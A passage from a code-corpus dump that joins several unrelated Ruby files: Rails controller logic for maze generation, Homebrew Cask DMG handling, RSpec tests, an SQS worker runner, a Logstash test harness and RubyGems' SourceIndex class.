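# path. FakeTemplate is an illustrative stand-in, and the require assumes the
# DependencyTracker shown above ships with the loaded ActionView version.
require "action_view"

FakeTemplate = Struct.new(:source)

erb = FakeTemplate.new(%q{<%= render "comments/comment", collection: @comments %>})
ActionView::DependencyTracker::ERBTracker.call("comments/index", erb)
# => ["comments/comment"]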
33.666667
115
0.594219
38fc8a1c66e0c02b7f1d8c6f34e50279c63271f5
3,410
require 'matrix' class Matrix public :"[]=", :set_element, :set_component end class MazeController < ApplicationController helper_method :getRandomMaze helper_method :getPaths def index @submission = Submission.find(params[:id]) end #Helper Functions def getRandomMaze(y, x) x_size = x y_size = y startPoint = [rand(y_size), rand(x_size)] endPoint = [rand(y_size), rand(x_size)] direction_options = ["N", "S", "E", "W", "NE", "NS", "NW", "ES", "EW", "SW", "NES", "NSW", "ESW", "NEW", "NESW"] init_maze = Matrix.build(y_size,x_size) {|row, col| (row %2)==(col%2)? direction_options[rand(direction_options.count)]:0} maze = Matrix.build(y_size,x_size){|row, col| (row %2)==(col%2)? init_maze[row,col]: complete_maze_from_neighbors(row,col, init_maze)} display_maze = maze.clone display_maze[startPoint[0], startPoint[1]] = "points" display_maze[endPoint[0], endPoint[1]] = "point" return getString(display_maze), getString(maze), startPoint, endPoint end def getPaths(mazeString, startPoint, endPoint) counter = 1 maze = Matrix.rows(mazeString.split(";").map {|row| row.split(",")}) x_size= maze.column_count y_size = maze.row_count paths = Matrix.build(y_size, x_size) {|row, col| 0} paths.to_a.count.times do |row| paths.to_a[0].count.times do |col| if row == 0 and col == 0 #Top Left Corner paths[row,col] = counter counter += 1 elsif row == 0 #Top Row if maze[row,col-1].include? "E" paths[row,col] = paths[row,col-1] else paths[row,col] = counter counter += 1 end elsif col == 0 #Left Column if maze[row-1,col].include? "S" paths[row,col] = paths[row-1,col] else paths[row,col] = counter counter += 1 end else #Anywhere else if maze[row,col-1].include? "E" and maze[row-1,col].include? "S" #left #up paths[row,col] = paths[row-1,col] >= paths[row,col-1] ? paths[row,col-1] : paths[row-1,col] #up #left #left #up paths = replace_in_matrix(paths,paths[row,col-1],paths[row-1,col]) #left #up elsif maze[row,col-1].include? "E" paths[row,col] = paths[row,col-1] elsif maze[row-1,col].include? "S" paths[row,col] = paths[row-1,col] else paths[row,col] = counter counter += 1 end end end end return getString(paths), paths[startPoint[0], startPoint[1]], paths[endPoint[0], endPoint[1]] end def replace_in_matrix( matrix, val1, val2) if val1 > val2 matrix.collect{ |m| m == val1 ? val2 : m} else matrix.collect{ |m| m == val2 ? val1 : m} end end def getString(matrix) output_string = "" matrix.row_vectors.each do |r| output_string = output_string + r.to_a.join(",") + ";" end output_string end def complete_maze_from_neighbors(row,col, maze) result = "" if row != 0 and maze[row-1,col] and maze[row-1,col].include? "S" result = result + "N" end if col != (maze.to_a[0].count) and maze[row,col+1] and maze[row,col+1].include? "W" result = result + "E" end if row != (maze.to_a.count) and maze[row+1,col] and maze[row+1,col].include? "N" result = result + "S" end if col != 0 and maze[row,col-1] and maze[row,col-1].include? "E" result = result + "W" end if result == "" result = "blank" end result end end
26.850394
136
0.613783
113c6fb11639b1114deed1726fe655271b1ccb00
3,962
require "set" require "tempfile" require "hbc/container/base" module Hbc class Container class Dmg < Base def self.me?(criteria) !criteria.command.run("/usr/bin/hdiutil", # realpath is a failsafe against unusual filenames args: ["imageinfo", Pathname.new(criteria.path).realpath], print_stderr: false).stdout.empty? end attr_reader :mounts def initialize(*args) super(*args) @mounts = [] end def extract mount! assert_mounts_found extract_mounts ensure eject! end def mount! plist = @command.run!("/usr/bin/hdiutil", # realpath is a failsafe against unusual filenames args: %w[mount -plist -nobrowse -readonly -noidme -mountrandom /tmp] + [Pathname.new(@path).realpath], input: "y\n") .plist @mounts = mounts_from_plist(plist) end def eject! @mounts.each do |mount| # realpath is a failsafe against unusual filenames mountpath = Pathname.new(mount).realpath next unless mountpath.exist? begin tries ||= 3 if tries > 1 @command.run("/usr/sbin/diskutil", args: ["eject", mountpath], print_stderr: false) else @command.run("/usr/sbin/diskutil", args: ["unmount", "force", mountpath], print_stderr: false) end raise CaskError, "Failed to eject #{mountpath}" if mountpath.exist? rescue CaskError => e raise e if (tries -= 1).zero? sleep 1 retry end end end private def extract_mounts @mounts.each(&method(:extract_mount)) end def extract_mount(mount) Tempfile.open(["", ".bom"]) do |bomfile| bomfile.close Tempfile.open(["", ".list"]) do |filelist| filelist.write(bom_filelist_from_path(mount)) filelist.close @command.run!("/usr/bin/mkbom", args: ["-s", "-i", filelist.path, "--", bomfile.path]) @command.run!("/usr/bin/ditto", args: ["--bom", bomfile.path, "--", mount, @cask.staged_path]) end end end def bom_filelist_from_path(mount) Dir.chdir(mount) do Dir.glob("**/*", File::FNM_DOTMATCH).map do |path| next if skip_path?(Pathname(path)) (path == ".") ? path : path.prepend("./") end.compact.join("\n").concat("\n") end end def skip_path?(path) dmg_metadata?(path) || system_dir_symlink?(path) end # unnecessary DMG metadata DMG_METADATA_FILES = Set.new %w[ .background .com.apple.timemachine.donotpresent .com.apple.timemachine.supported .DocumentRevisions-V100 .DS_Store .fseventsd .MobileBackups .Spotlight-V100 .TemporaryItems .Trashes .VolumeIcon.icns ].freeze def dmg_metadata?(path) relative_root = path.sub(%r{/.*}, "") DMG_METADATA_FILES.include?(relative_root.basename.to_s) end def system_dir_symlink?(path) # symlinks to system directories (commonly to /Applications) path.symlink? && MacOS.system_dir?(path.readlink) end def mounts_from_plist(plist) return [] unless plist.respond_to?(:fetch) plist.fetch("system-entities", []).map { |e| e["mount-point"] }.compact end def assert_mounts_found raise CaskError, "No mounts found in '#{@path}'; perhaps it is a bad DMG?" if @mounts.empty? end end end end
29.567164
133
0.527764
28cb270ccdff2a0fd7ca51a8d22aa3d0dfad826a
860
cask "dynobase" do version "1.4.2" if Hardware::CPU.intel? sha256 "df8cc4e530d181083f31214f31d789f8185954b668ceef86acb58b163b1c0625" url "https://github.com/Dynobase/dynobase/releases/download/#{version}/Dynobase-#{version}.dmg", verified: "github.com/Dynobase/dynobase/" else sha256 "e6555964c33184f8f265ba75c79d1cf826e638ce91d25bedddeefd5b79551a6b" url "https://github.com/Dynobase/dynobase/releases/download/#{version}/Dynobase-#{version}-arm64.dmg", verified: "github.com/Dynobase/dynobase/" end name "Dynobase" desc "GUI Client for DynamoDB" homepage "https://dynobase.dev/" livecheck do url :url strategy :github_latest end app "Dynobase.app" zap trash: [ "~/Library/Application Support/dynobase", "~/Library/Saved Application State/com.rwilinski.dynobase.savedState", ] end
26.875
106
0.726744
79ca09eef81dcd019ba4e30275c3e6299003e167
2,456
# # Specifying sentofu # # Wed May 22 07:56:28 JST 2019 # require 'spec_helper' describe Sentofu do describe '.version_match' do { [ '3.0.1', '*' ] => true, [ '3.0.1', 'x' ] => true, [ '3.0.1', '3.x' ] => true, [ '3.0.1', '3.*' ] => true, [ '3.0.1', '3.0' ] => true, [ '3.0.1', '3.0.0' ] => false, [ '3.0.1', '3.1.x' ] => false, [ '3.0.1', '4.x' ] => false, [ '3.0.1', '4.*' ] => false, }.each do |(ver, pat), res| it "returns #{res} for #{ver.inspect} against #{pat.inspect}" do module Sentofu; class << self; public :version_match; end; end expect(Sentofu.version_match(ver, pat)).to eq(res) end end end describe '.init' do context 'directory' do after :each do Sentofu.init end it 'inits from api_company_1.0.0.yaml and friends' do expect(Sentofu.common.spec[:meta]).not_to eq(nil) Sentofu.init('.') spec = Sentofu.common.spec[:meta] spec.delete(:modified) expect( spec ).to eq({ #modified: '2019-06-13T03:45Z', name: 'common', path: './api_common_1.0.0.yaml', version: '1.0.0' }) expect(Sentofu.company.version).to eq('1.0.0') #expect(Sentofu.company.modified).to eq(Time.parse('2019-06-13T03:45Z')) r = Sentofu.company.query('/topic-search', keyword: 'ibm') expect(r['data'].collect { |e| e['id'] }).to include(128) end it 'fails if the target dir does not contain any api_*.yaml files' do expect { Sentofu.init('lib') }.to raise_error( RuntimeError, 'no api yaml files under "lib"' ) end end end describe '.on_response' do after :each do module Sentofu class << self remove_method(:on_response) end end end it 'is called if present' do def Sentofu.on_response(res) res[:seen] = 1 end # #Sentofu.define_singleton_method(:on_response) do |res| # res[:seen] = 1 #end # #module Sentofu # def self.on_response(res) # res[:seen] = 1 # end #end r = Sentofu.company.query('/topic-search', keyword: 'ibm') expect(r[:seen]).to eq(1) r = Sentofu.company.topic_search(keyword: 'ibm') expect(r[:seen]).to eq(1) end end end
20.638655
80
0.514658
263701cbb8c60256734079ad620a0fae0423e0e8
1,330
# Copyright 2011-2020, The Trustees of Indiana University and Northwestern # University. Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software distributed # under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR # CONDITIONS OF ANY KIND, either express or implied. See the License for the # specific language governing permissions and limitations under the License. # --- END LICENSE_HEADER BLOCK --- module FedoraMigrate module AdminCollection class DefaultRightsDatastreamMover < PermissionsMover def migrate [:read_groups, :read_users].each do |permission| next unless target.respond_to?("default_" + permission.to_s + "=") report << "default_#{permission} = #{send(permission)}" target.send("default_" + permission.to_s + "=", send(permission)) end target.default_hidden = discover_groups.include?("nobody") if target.respond_to?("default_hidden=") report << "default_hidden = #{target.default_hidden}" # save # super report end end end end
40.30303
107
0.697744
edf818ea45499d8fb7d506569e48132fe503689a
3,264
# Copyright �2011-2012 Pieter van Beek <[email protected]> # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. require 'sinatra/base' require 'sinatra/reloader' require './epic_resources.rb' require './epic_serialization.rb' class String def slashify if '/' == self[-1,1] self.dup else self + "/" end end def slashify! if '/' == self[-1,1] self else self << "/" end end def unslashify if '/' == self[-1,1] && '/' != self self.chomp '/' else self.dup end end def unslashify! if '/' == self[-1,1] && '/' != self self.chomp! '/' else self end end end # The namespace for all of the webservice as developed by EPIC. module EPIC class Application < Sinatra::Base include EPIC::Serialization configure(:development) { register Sinatra::Reloader } configure(:development, :test, :production) { enable :logging } set :static, true set :default_encoding, 'UTF-8' def self.setup_resolver @resolver = hdllib.HandleResolver.new sessionTracker = hdllib.ClientSessionTracker.new sessionTracker.setSessionSetupInfo( hdllib.SessionSetupInfo.new(nil) ) @resolver.setSessionTracker(sessionTracker) end before do $logger = logger end error 406 do erb :'error406.html', :content_type => 'application/xhtml+xml' end get '/' do resources = Resources.new( '/', { :uri => 'handles/', :description => 'All handles, by prefix' }, { :uri => 'profiles/', :description => 'All profiles, by prefix' }, { :uri => 'templates/', :description => 'All templates, by prefix' }, ) some_erb :index, :locals => { :path => '/', :resources => resources } end get %r{^(/(handles|profiles|templates)/)$} do |path, what| description = "Collection of #{what}" resources = Na.nas.collect do |na| { :uri => na[5..-1] + '/', :name => na.dup, :description => description } end some_erb :index, :locals => { :path => path, :resources => resources } end get '/handles/*/' do |prefix| #EPIC::Encoder.encode_suffixes(prefix, ) resources = Suffixes.new( prefix ).collect do |suffix| { :uri => CGI.escape(suffix), :name => CGI.escapeHTML(prefix + '/' + suffix), :description => 'Handle' } end some_erb :index, :locals => { :path => "/handles/#{prefix}/", :resources => resources } end get '/handles/*/*' do |prefix, suffix| handle = Handle.new prefix, suffix return 404 if handle.empty? some_erb :handle, :locals => { :path => "/handles/#{prefix}/#{suffix}", :handle => handle } end end end # module EPIC
24
75
0.609681
18544f249afee42c41c237463dbf140c2a668632
2,555
require 'sqs_worker/manager' require 'sqs_worker/worker_resolver' require 'sqs_worker/heartbeat/log_file_heartbeat_monitor' module SqsWorker class Runner HEARTBEAT_THRESHOLD = 60 def self.run_all new.run_all end def run_all trap_signals prepare_to_start_processing start_processing while true handle_signals sleep 1 end rescue Interrupt exit 0 end def shutdown managers.each(&:prepare_for_shutdown) while managers.any?(&:running?) sleep 1 end managers.each do |manager| SqsWorker.logger.info(event_name: 'sqs_worker_shutdown_complete', type: manager.worker_class) end managers.each(&:terminate) end private def prepare_to_start_processing managers.each(&:prepare_to_start) end def start_processing managers.each(&:start) end def restart_processing managers.each(&:soft_start) end def stop_processing managers.each(&:soft_stop) running_managers = managers.select(&:running?) until running_managers.empty? running_managers.each do |manager| SqsWorker.logger.info(event_name: 'sqs_worker_still_running', type: manager.worker_class) end sleep 0.1 running_managers = managers.select(&:running?) end SqsWorker.logger.info(event_name: 'sqs_worker_soft_stop_complete', type: 'SqsWorker::Runner') end def managers @managers ||= worker_classes.map { |worker_class| Manager.new(worker_class: worker_class, heartbeat_monitor: heartbeat_monitor) } end def worker_classes @worker_classes ||= WorkerResolver.new.resolve_worker_classes end def heartbeat_monitor @heartbeat_monitor ||= Heartbeat::LogFileHeartbeatMonitor.new(logger: SqsWorker.heartbeat_logger, threshold_seconds: HEARTBEAT_THRESHOLD) end def trap_signals @signals ||= [] %w(INT TERM USR1 USR2).each do |sig| Signal.trap(sig) do @signals << sig end end end def handle_signals while sig = @signals.shift case sig when 'USR1' stop_processing when 'USR2' restart_processing when 'TERM' shutdown raise Interrupt, 'Shutting down!' when 'INT' shutdown raise Interrupt, 'Shutting down!' end end end end end
22.610619
135
0.626614
6a8d09786a45db60cb7661bdc4a72804a38819d8
289
require_relative "../../config/environment" class MovieRecommender::Movie attr_accessor :title, :url @@all =[] def initialize(title:, url:) @title = title @url = url @@all << self end def self.all @@all end def self.destroy @@all.clear end end
11.115385
43
0.602076
79486fcf205cc005766ffb78a55daad4036e2a4a
74
# frozen_string_literal: true module StoryBranch VERSION = '2.0.1' end
12.333333
29
0.743243
1a53f2628074292847357c1bca6e87d24074d457
913
require 'test_helper' class DeploymentTasksTest < Minitest::Test def setup load "test/fixtures/123_test_task.rb" ActiveRecord::Base.connection.execute("delete from #{::DeploymentTasks.database_table_name}") end def test_that_it_has_a_version_number refute_nil ::DeploymentTasks::VERSION end def test_that_run_works assert_equal [TestTask], ::DeploymentTasks.run! end def test_that_rollback_works assert ::DeploymentTasks.rollback! end def test_that_rollback_with_version_works assert ::DeploymentTasks.rollback!('12') end def test_that_rollback_then_run_works assert_equal [TestTask], ::DeploymentTasks.run! assert ::DeploymentTasks.rollback!('123') assert_equal [TestTask], ::DeploymentTasks.run! end end module DeploymentTasks class Runner private def file_require_path(filename) "test/fixtures/#{filename}" end end end
21.738095
97
0.751369
2600e6525b803b8a455e6c4dd2e89e956b29de54
8,893
# Licensed to Elasticsearch B.V. under one or more contributor # license agreements. See the NOTICE file distributed with # this work for additional information regarding copyright # ownership. Elasticsearch B.V. licenses this file to you under # the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. require_relative "monitoring_api" require "childprocess" require "bundler" require "socket" require "tempfile" require 'yaml' # A locally started Logstash service class LogstashService < Service LS_ROOT_DIR = File.join("..", "..", "..", "..") LS_VERSION_FILE = File.expand_path(File.join(LS_ROOT_DIR, "versions.yml"), __FILE__) LS_BUILD_DIR = File.join(LS_ROOT_DIR, "build") LS_BIN = File.join("bin", "logstash") LS_CONFIG_FILE = File.join("config", "logstash.yml") SETTINGS_CLI_FLAG = "--path.settings" STDIN_CONFIG = "input {stdin {}} output { }" RETRY_ATTEMPTS = 60 TIMEOUT_MAXIMUM = 60 * 10 # 10mins. class ProcessStatus < Struct.new(:exit_code, :stderr_and_stdout); end @process = nil attr_reader :logstash_home attr_reader :default_settings_file attr_writer :env_variables def initialize(settings) super("logstash", settings) # if you need to point to a LS in different path if @settings.is_set?("ls_home_abs_path") @logstash_home = @settings.get("ls_home_abs_path") else # use the LS which was just built in source repo ls_version_file = YAML.load_file(LS_VERSION_FILE) ls_file = "logstash-" + ls_version_file["logstash"] # First try without the snapshot if it's there @logstash_home = File.expand_path(File.join(LS_BUILD_DIR, ls_file), __FILE__) @logstash_home += "-SNAPSHOT" unless Dir.exist?(@logstash_home) puts "Using #{@logstash_home} as LS_HOME" @logstash_bin = File.join("#{@logstash_home}", LS_BIN) raise "Logstash binary not found in path #{@logstash_home}" unless File.file? @logstash_bin end @default_settings_file = File.join(@logstash_home, LS_CONFIG_FILE) @monitoring_api = MonitoringAPI.new end def alive? if @process.nil? || @process.exited? raise "Logstash process is not up because of an error, or it stopped" else @process.alive? end end def exited? @process.exited? end def exit_code @process.exit_code end # Starts a LS process in background with a given config file # and shuts it down after input is completely processed def start_background(config_file) spawn_logstash("-e", config_file) end # Given an input this pipes it to LS. 
Expects a stdin input in LS def start_with_input(config, input) Bundler.with_unbundled_env do `cat #{Shellwords.escape(input)} | LS_JAVA_HOME=#{java.lang.System.getProperty('java.home')} #{Shellwords.escape(@logstash_bin)} -e \'#{config}\'` end end def start_background_with_config_settings(config, settings_file) spawn_logstash("-f", "#{config}", "--path.settings", settings_file) end def start_with_config_string(config) spawn_logstash("-e", "#{config} ") end # Can start LS in stdin and can send messages to stdin # Useful to test metrics and such def start_with_stdin puts "Starting Logstash #{@logstash_bin} -e #{STDIN_CONFIG}" Bundler.with_unbundled_env do out = Tempfile.new("duplex") out.sync = true @process = build_child_process("-e", STDIN_CONFIG) # pipe STDOUT and STDERR to a file @process.io.stdout = @process.io.stderr = out @process.duplex = true java_home = java.lang.System.getProperty('java.home') @process.environment['LS_JAVA_HOME'] = java_home @process.start wait_for_logstash puts "Logstash started with PID #{@process.pid}, LS_JAVA_HOME: #{java_home}" if alive? end end def write_to_stdin(input) if alive? @process.io.stdin.puts(input) end end # Spawn LS as a child process def spawn_logstash(*args) Bundler.with_unbundled_env do @process = build_child_process(*args) @env_variables.map { |k, v| @process.environment[k] = v} unless @env_variables.nil? java_home = java.lang.System.getProperty('java.home') @process.environment['LS_JAVA_HOME'] = java_home @process.io.inherit! @process.start puts "Logstash started with PID #{@process.pid}, LS_JAVA_HOME: #{java_home}" if @process.alive? end end def build_child_process(*args) feature_config_dir = @settings.feature_config_dir # if we are using a feature flag and special settings dir to enable it, use it # If some tests is explicitly using --path.settings, ignore doing this, because the tests # chose to overwrite it. if feature_config_dir && !args.include?(SETTINGS_CLI_FLAG) args << "--path.settings" args << feature_config_dir puts "Found feature flag. Starting LS using --path.settings #{feature_config_dir}" end puts "Starting Logstash: #{@logstash_bin} #{args}" ChildProcess.build(@logstash_bin, *args) end def teardown if [email protected]? # todo: put this in a sleep-wait loop to kill it force kill @process.io.stdin.close rescue nil @process.stop @process = nil end end # check if LS HTTP port is open def is_port_open? begin s = TCPSocket.open("localhost", 9600) s.close return true rescue Errno::ECONNREFUSED, Errno::EHOSTUNREACH return false end end def monitoring_api raise "Logstash is not up, but you asked for monitoring API" unless alive? @monitoring_api end # Wait until LS is started by repeatedly doing a socket connection to HTTP port def wait_for_logstash tries = RETRY_ATTEMPTS while tries > 0 if is_port_open? return else sleep 1 end tries -= 1 end raise "Logstash REST API did not come up after #{RETRY_ATTEMPTS}s." end # this method only overwrites existing config with new config # it does not assume that LS pipeline is fully reloaded after a # config change. It is up to the caller to validate that. 
def reload_config(initial_config_file, reload_config_file) FileUtils.cp(reload_config_file, initial_config_file) end def get_version `#{Shellwords.escape(@logstash_bin)} --version`.split("\n").last end def get_version_yml LS_VERSION_FILE end def process_id @process.pid end def application_settings_file feature_config_dir = @settings.feature_config_dir unless feature_config_dir @default_settings_file else File.join(feature_config_dir, "logstash.yml") end end def plugin_cli PluginCli.new(self) end def lock_file File.join(@logstash_home, "Gemfile.lock") end def run_cmd(cmd_args, change_dir = true, environment = {}) out = Tempfile.new("content") out.sync = true cmd, *args = cmd_args process = ChildProcess.build(cmd, *args) environment.each do |k, v| process.environment[k] = v end process.io.stdout = process.io.stderr = out Bundler.with_unbundled_env do if change_dir Dir.chdir(@logstash_home) do process.start end else process.start end end process.poll_for_exit(TIMEOUT_MAXIMUM) out.rewind ProcessStatus.new(process.exit_code, out.read) end def run(*args) run_cmd [ @logstash_bin, *args ] end class PluginCli LOGSTASH_PLUGIN = File.join("bin", "logstash-plugin") attr_reader :logstash_plugin def initialize(logstash_service) @logstash = logstash_service @logstash_plugin = File.join(@logstash.logstash_home, LOGSTASH_PLUGIN) end def remove(plugin_name) run("remove #{plugin_name}") end def prepare_offline_pack(plugins, output_zip = nil) plugins = Array(plugins) if output_zip.nil? run("prepare-offline-pack #{plugins.join(" ")}") else run("prepare-offline-pack --output #{output_zip} #{plugins.join(" ")}") end end def list(plugin_name, verbose = false) run("list #{plugin_name} #{verbose ? "--verbose" : ""}") end def install(plugin_name) run("install #{plugin_name}") end def run(command) run_raw("#{logstash_plugin} #{command}") end def run_raw(cmd, change_dir = true, environment = {}) @logstash.run_cmd(cmd.split(' '), change_dir, environment) end end end
28.873377
152
0.688856
b940b83cf872bd0b74cab7a4e75300af60c8c4fe
13,812
#-- # Copyright 2006 by Chad Fowler, Rich Kilmer, Jim Weirich and others. # All rights reserved. # See LICENSE.txt for permissions. #++ require 'rubygems' require 'rubygems/user_interaction' require 'rubygems/specification' require 'rubygems/spec_fetcher' ## # The SourceIndex object indexes all the gems available from a # particular source (e.g. a list of gem directories, or a remote # source). A SourceIndex maps a gem full name to a gem # specification. # # NOTE:: The class used to be named Cache, but that became # confusing when cached source fetchers where introduced. The # constant Gem::Cache is an alias for this class to allow old # YAMLized source index objects to load properly. class Gem::SourceIndex include Enumerable include Gem::UserInteraction attr_reader :gems # :nodoc: ## # Directories to use to refresh this SourceIndex when calling refresh! attr_accessor :spec_dirs class << self include Gem::UserInteraction ## # Factory method to construct a source index instance for a given # path. # # deprecated:: # If supplied, from_installed_gems will act just like # +from_gems_in+. This argument is deprecated and is provided # just for backwards compatibility, and should not generally # be used. # # return:: # SourceIndex instance def from_installed_gems(*deprecated) if deprecated.empty? from_gems_in(*installed_spec_directories) else from_gems_in(*deprecated) # HACK warn end end ## # Returns a list of directories from Gem.path that contain specifications. def installed_spec_directories Gem.path.collect { |dir| File.join(dir, "specifications") } end ## # Creates a new SourceIndex from the ruby format gem specifications in # +spec_dirs+. def from_gems_in(*spec_dirs) source_index = new source_index.spec_dirs = spec_dirs source_index.refresh! end ## # Loads a ruby-format specification from +file_name+ and returns the # loaded spec. def load_specification(file_name) begin spec_code = File.read(file_name).untaint gemspec = eval spec_code, binding, file_name if gemspec.is_a?(Gem::Specification) gemspec.loaded_from = file_name return gemspec end alert_warning "File '#{file_name}' does not evaluate to a gem specification" rescue SignalException, SystemExit raise rescue SyntaxError => e alert_warning e alert_warning spec_code rescue Exception => e alert_warning(e.inspect.to_s + "\n" + spec_code) alert_warning "Invalid .gemspec format in '#{file_name}'" end return nil end end ## # Constructs a source index instance from the provided # specifications # # specifications:: # [Hash] hash of [Gem name, Gem::Specification] pairs def initialize(specifications={}) @gems = specifications @spec_dirs = nil end ## # Reconstruct the source index from the specifications in +spec_dirs+. def load_gems_in(*spec_dirs) @gems.clear spec_dirs.reverse_each do |spec_dir| spec_files = Dir.glob File.join(spec_dir, '*.gemspec') spec_files.each do |spec_file| gemspec = self.class.load_specification spec_file.untaint add_spec gemspec if gemspec end end self end ## # Returns an Array specifications for the latest versions of each gem in # this index. def latest_specs result = Hash.new { |h,k| h[k] = [] } latest = {} sort.each do |_, spec| name = spec.name curr_ver = spec.version prev_ver = latest.key?(name) ? latest[name].version : nil next unless prev_ver.nil? or curr_ver >= prev_ver or latest[name].platform != Gem::Platform::RUBY if prev_ver.nil? 
or (curr_ver > prev_ver and spec.platform == Gem::Platform::RUBY) then result[name].clear latest[name] = spec end if spec.platform != Gem::Platform::RUBY then result[name].delete_if do |result_spec| result_spec.platform == spec.platform end end result[name] << spec end result.values.flatten end ## # Add a gem specification to the source index. def add_spec(gem_spec) @gems[gem_spec.full_name] = gem_spec end ## # Add gem specifications to the source index. def add_specs(*gem_specs) gem_specs.each do |spec| add_spec spec end end ## # Remove a gem specification named +full_name+. def remove_spec(full_name) @gems.delete(full_name) end ## # Iterate over the specifications in the source index. def each(&block) # :yields: gem.full_name, gem @gems.each(&block) end ## # The gem specification given a full gem spec name. def specification(full_name) @gems[full_name] end ## # The signature for the source index. Changes in the signature indicate a # change in the index. def index_signature require 'rubygems/digest/sha2' Gem::SHA256.new.hexdigest(@gems.keys.sort.join(',')).to_s end ## # The signature for the given gem specification. def gem_signature(gem_full_name) require 'rubygems/digest/sha2' Gem::SHA256.new.hexdigest(@gems[gem_full_name].to_yaml).to_s end def size @gems.size end alias length size ## # Find a gem by an exact match on the short name. def find_name(gem_name, version_requirement = Gem::Requirement.default) search(/^#{gem_name}$/, version_requirement) end ## # Search for a gem by Gem::Dependency +gem_pattern+. If +only_platform+ # is true, only gems matching Gem::Platform.local will be returned. An # Array of matching Gem::Specification objects is returned. # # For backwards compatibility, a String or Regexp pattern may be passed as # +gem_pattern+, and a Gem::Requirement for +platform_only+. This # behavior is deprecated and will be removed. def search(gem_pattern, platform_only = false) version_requirement = nil only_platform = false case gem_pattern # TODO warn after 2008/03, remove three months after when Regexp then version_requirement = platform_only || Gem::Requirement.default when Gem::Dependency then only_platform = platform_only version_requirement = gem_pattern.version_requirements gem_pattern = if Regexp === gem_pattern.name then gem_pattern.name elsif gem_pattern.name.empty? then // else /^#{Regexp.escape gem_pattern.name}$/ end else version_requirement = platform_only || Gem::Requirement.default gem_pattern = /#{gem_pattern}/i end unless Gem::Requirement === version_requirement then version_requirement = Gem::Requirement.create version_requirement end specs = @gems.values.select do |spec| spec.name =~ gem_pattern and version_requirement.satisfied_by? spec.version end if only_platform then specs = specs.select do |spec| Gem::Platform.match spec.platform end end specs.sort_by { |s| s.sort_obj } end ## # Replaces the gems in the source index from specifications in the # directories this source index was created from. Raises an exception if # this source index wasn't created from a directory (via from_gems_in or # from_installed_gems, or having spec_dirs set). def refresh! raise 'source index not created from disk' if @spec_dirs.nil? load_gems_in(*@spec_dirs) end ## # Returns an Array of Gem::Specifications that are not up to date. 
def outdated outdateds = [] latest_specs.each do |local| name = local.name dependency = Gem::Dependency.new name, ">= #{local.version}" begin fetcher = Gem::SpecFetcher.fetcher remotes = fetcher.find_matching dependency remotes = remotes.map { |(name, version,),| version } rescue Gem::RemoteFetcher::FetchError => e raise unless fetcher.warn_legacy e do require 'rubygems/source_info_cache' specs = Gem::SourceInfoCache.search_with_source dependency, true remotes = specs.map { |spec,| spec.version } end end latest = remotes.sort.last outdateds << name if latest and local.version < latest end outdateds end ## # Updates this SourceIndex from +source_uri+. If +all+ is false, only the # latest gems are fetched. def update(source_uri, all) source_uri = URI.parse source_uri unless URI::Generic === source_uri source_uri.path += '/' unless source_uri.path =~ /\/$/ use_incremental = false begin gem_names = fetch_quick_index source_uri, all remove_extra gem_names missing_gems = find_missing gem_names return false if missing_gems.size.zero? say "Missing metadata for #{missing_gems.size} gems" if missing_gems.size > 0 and Gem.configuration.really_verbose use_incremental = missing_gems.size <= Gem.configuration.bulk_threshold rescue Gem::OperationNotSupportedError => ex alert_error "Falling back to bulk fetch: #{ex.message}" if Gem.configuration.really_verbose use_incremental = false end if use_incremental then update_with_missing(source_uri, missing_gems) else new_index = fetch_bulk_index(source_uri) @gems.replace(new_index.gems) end true end def ==(other) # :nodoc: self.class === other and @gems == other.gems end def dump Marshal.dump(self) end private def fetcher require 'rubygems/remote_fetcher' Gem::RemoteFetcher.fetcher end def fetch_index_from(source_uri) @fetch_error = nil indexes = %W[ Marshal.#{Gem.marshal_version}.Z Marshal.#{Gem.marshal_version} yaml.Z yaml ] indexes.each do |name| spec_data = nil index = source_uri + name begin spec_data = fetcher.fetch_path index spec_data = unzip(spec_data) if name =~ /\.Z$/ if name =~ /Marshal/ then return Marshal.load(spec_data) else return YAML.load(spec_data) end rescue => e if Gem.configuration.really_verbose then alert_error "Unable to fetch #{name}: #{e.message}" end @fetch_error = e end end nil end def fetch_bulk_index(source_uri) say "Bulk updating Gem source index for: #{source_uri}" if Gem.configuration.verbose index = fetch_index_from(source_uri) if index.nil? then raise Gem::RemoteSourceException, "Error fetching remote gem cache: #{@fetch_error}" end @fetch_error = nil index end ## # Get the quick index needed for incremental updates. def fetch_quick_index(source_uri, all) index = all ? 'index' : 'latest_index' zipped_index = fetcher.fetch_path source_uri + "quick/#{index}.rz" unzip(zipped_index).split("\n") rescue ::Exception => e unless all then say "Latest index not found, using quick index" if Gem.configuration.really_verbose fetch_quick_index source_uri, true else raise Gem::OperationNotSupportedError, "No quick index found: #{e.message}" end end ## # Make a list of full names for all the missing gemspecs. def find_missing(spec_names) unless defined? @originals then @originals = {} each do |full_name, spec| @originals[spec.original_name] = spec end end spec_names.find_all { |full_name| @originals[full_name].nil? } end def remove_extra(spec_names) dictionary = spec_names.inject({}) { |h, k| h[k] = true; h } each do |name, spec| remove_spec name unless dictionary.include? spec.original_name end end ## # Unzip the given string. 
